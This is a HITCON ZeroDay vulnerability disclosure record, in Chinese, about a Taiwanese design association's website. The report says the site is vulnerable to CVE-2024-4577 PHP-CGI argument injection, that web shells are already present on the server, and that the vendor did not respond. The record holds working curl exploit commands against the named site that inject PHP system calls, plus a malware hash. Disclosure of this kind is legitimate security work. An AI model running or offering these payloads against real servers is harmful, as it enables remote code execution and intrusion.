Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00085
- 發信 Vendor: 社團法人台灣設計菁英協會
- Title: 社團法人台灣設計菁英協會 PHP CGI參數注入弱點
- Introduction: 主機遭駭,已被攻擊者取得執行權限
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2025/01/20 23:04:27 : 新提交 (由 Enival 更新此狀態)
- 2025/01/21 14:11:35 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/23 17:43:53 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/23 17:43:54 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/04/05 03:02:00 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00085
- 通報者:zeyyaz (Enival)
- 風險:嚴重
- 類型:程式碼執行 (Code Execution)
參考資料
相關網址
敘述
-
該網站存在CVE-2024-4577漏洞,可透過 CLI 指令加以驗證。
curl -k -v -d "<?php system('whoami'); exit(); ?>" "http://www.tdea.com.tw/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0" -
數個Web Shell(IRC後門變種)留存於本機端
curl -k -v -d "<?php system('dir /w'); exit(); ?>" "http://www.tdea.com.tw/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0" -
惡意程式已被運行,某品牌防毒軟體防護失效。
(1)
curl -k -v -d "<?php system('wmic process where "ProcessId=14236" get ExecutablePath'); exit(); ?>" "http://www.tdea.com.tw/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
(2)
curl -k -v -d "<?php system('certutil -hashfile C:\xampp\php\exploer.exe sha256'); exit(); ?>" "http://www.tdea.com.tw/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
(3)
d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1